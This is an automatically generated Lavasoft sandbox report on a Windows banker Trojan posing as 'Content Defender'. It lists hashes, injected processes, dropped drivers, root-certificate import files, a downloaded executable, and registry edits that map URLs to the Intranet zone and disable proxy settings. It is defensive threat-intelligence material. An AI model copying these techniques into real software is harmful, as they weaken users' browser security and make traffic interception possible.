Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR, BankerGeneric.YR (Lavasoft MAS)Behaviour: Banker, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: ec805d4411149c36848938d5e82f6aff
SHA1: 3f1b64609c56d13c4298db68af23962e0e63141a
SHA256: f1905a74df4e6cf7485d0a23b1db6a206fa072fa350fa76865a7e5a6c037633c
SSDeep: 98304:whdN5ohSvG2TE6nrJ8NakTQVd5Oj8hIRTGFLsrmNq0stAQmFW:Y75oh65O5GVsrmNq0stAQmFW
Size: 4273912 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, BorlandDelphi30, BorlandDelphiv30, ACProtect141
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
condefsetup (19).exe:1984
verclsid.exe:1272
cd.exe:1200
cd.exe:532
ASIns.exe:388
The Trojan injects its code into the following process(es):
%original file name%.exe:1012
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutexZonesCacheCounterMutexZonesCounterMutexRasPbFileShimCacheMutexMutexNPA_UnitVersioning_1012
File activity
The process condefsetup (19).exe:1984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\condefclean.exe (7716 bytes)
%Program Files%\Content Defender\nfregdrv.exe (601 bytes)
%Program Files%\Content Defender\nss\smime3.dll (601 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\ssleay32.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\smime3.dll (7716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_i386.sys (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\softokn3.dll (4061 bytes)
%Program Files%\Content Defender\ContentDefenderPS.dll (13 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\libeay32.dll (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe (10588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\import_root_cert.exe (941 bytes)
%Program Files%\Content Defender\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_amd64.sys (58 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys (3516 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\cd.exe (6341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plds4.dll (17 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\condefclean.exe (7716 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\import_root_cert.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ssleay32.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\ContentDefender.zip (37274 bytes)
%Program Files%\Content Defender\nss\softokn3.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__amd64.sys (61 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll (6116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plc4.dll (20 bytes)
%System%\drivers\condef.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\condefclean.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\condefclean.exe (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss (4 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__i386.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\smime3.dll (7716 bytes)
%Program Files%\Content Defender\nss\mozcrt19.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderPS.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\libeay32.dll (86270 bytes)
%Program Files%\Content Defender\nss\nspr4.dll (673 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\libeay32.dll (11493 bytes)
%Program Files%\Content Defender\import_root_cert.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll (484 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nfregdrv.exe (9476 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys (4356 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nfregdrv.exe (9196 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nss3.dll (24908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\certutil.exe (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\cd.exe (41084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_i386.sys (48 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ssleay32.dll (26028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nss3.dll (4061 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\smime3.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plc4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll (48748 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32 (4 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\cd.exe (34724 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys (4356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\softokn3.dll (4061 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\certutil.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__i386.sys (56 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\libeay32.dll (156321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\libeay32.dll (20400 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ssleay32.dll (32684 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\mozcrt19.dll (48748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ssleay32.dll (4861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\smime3.dll (941 bytes)
%Program Files%\Content Defender\nss\certutil.exe (601 bytes)
%Program Files%\Content Defender\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nss3.dll (24908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderPS.dll (13 bytes)
%Program Files%\Content Defender\ConDefSetup.exe (41656 bytes)
%Program Files%\Content Defender\condefclean.exe (601 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe (8836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\cd.exe (5381 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Content Defender\Settings.lnk (804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_amd64.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nss3.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plc4.dll (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys (3516 bytes)
%Program Files%\Content Defender\nss\nss3.dll (2105 bytes)
%Program Files%\Content Defender\ContentDefenderControl.exe (673 bytes)
%Program Files%\Content Defender\cd.exe (3073 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plds4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nfregdrv.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ssleay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\condefclean.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nss3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nfregdrv.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\ContentDefender.zip (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\certutil.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\118[1] (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\smime3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plds4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\certutil.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\import_root_cert.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\softokn3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nss3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nspr4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\cd.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ssleay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\smime3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\condefclean.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__i386.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plc4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\libeay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plc4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32 (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64 (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\libeay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\cd.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys (0 bytes)
The process %original file name%.exe:1012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\libeay32.dll (6341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\31F03376-17B9-4185-A6B6-3F7E5BFAF610\condefsetup (19).exe (39950 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F2D6D111-7DB7-43BB-B86B-087C5EDE56A9\ASIns.exe (3667 bytes)
C:\ssleay32.dll (1821 bytes)
The process cd.exe:532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Content Defender\cert\SSL\ContentDefender 2.cer (774 bytes)
%Program Files%\Content Defender\cert\SSL\cert.db (2 bytes)
The process ASIns.exe:388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsl5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp (20699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\check[1].exe (12984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp (12984 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl5.tmp (0 bytes)
Registry activity
The process condefsetup (19).exe:1984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"EstimatedSize" = "6000"
"Publisher" = "Artex Management S. A."
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"InstallDate" = "20141218"
"DisplayVersion" = "1.80"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\BagMRU]
"MRUListEx" = "00 00 00 00 01 00 00 00 03 00 00 00 02 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\ContentDefender]
"CampaignID" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Services\condef]
"Tag" = "8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"DisplayIcon" = "%Program Files%\Content Defender\ConDefSetup.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"DisplayName" = "Content Defender"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\BagMRU\0]
"MRUListEx" = "02 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\ContentDefender]
"SourceId" = "106"
"ff" = "yes"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "08 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"UninstallString" = "%Program Files%\Content Defender\ConDefSetup.exe uninst=1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\BagMRU]
"NodeSlots" = "02 02 02 02 02 02 02 02 02 02 02"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 51 8E B7 0B 8A A5 3D 8B 6D 19 08 03 88 4C C8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} {000214E6-0000-0000-C000-000000000046} 0x401" = "01 00 00 00 7C 6C 9C 7C 08 75 54 15 30 39 D1 01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\ContentDefender]
"SiteID" = "200075929"
"UserId" = "549FB71C-C58B-4B41-A495-C14234748C4C"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\ec805d4411149c36848938d5e82f6aff\DEBUG]
"Trace Level" = ""
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\31F03376-17B9-4185-A6B6-3F7E5BFAF610]
"condefsetup (19).exe" = "Content Defender Setup"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\F2D6D111-7DB7-43BB-B86B-087C5EDE56A9]
"ASIns.exe" = "ASIns"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB 2D BF F0 FB 51 5B 5F 60 03 F4 5C 10 11 D9 76"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
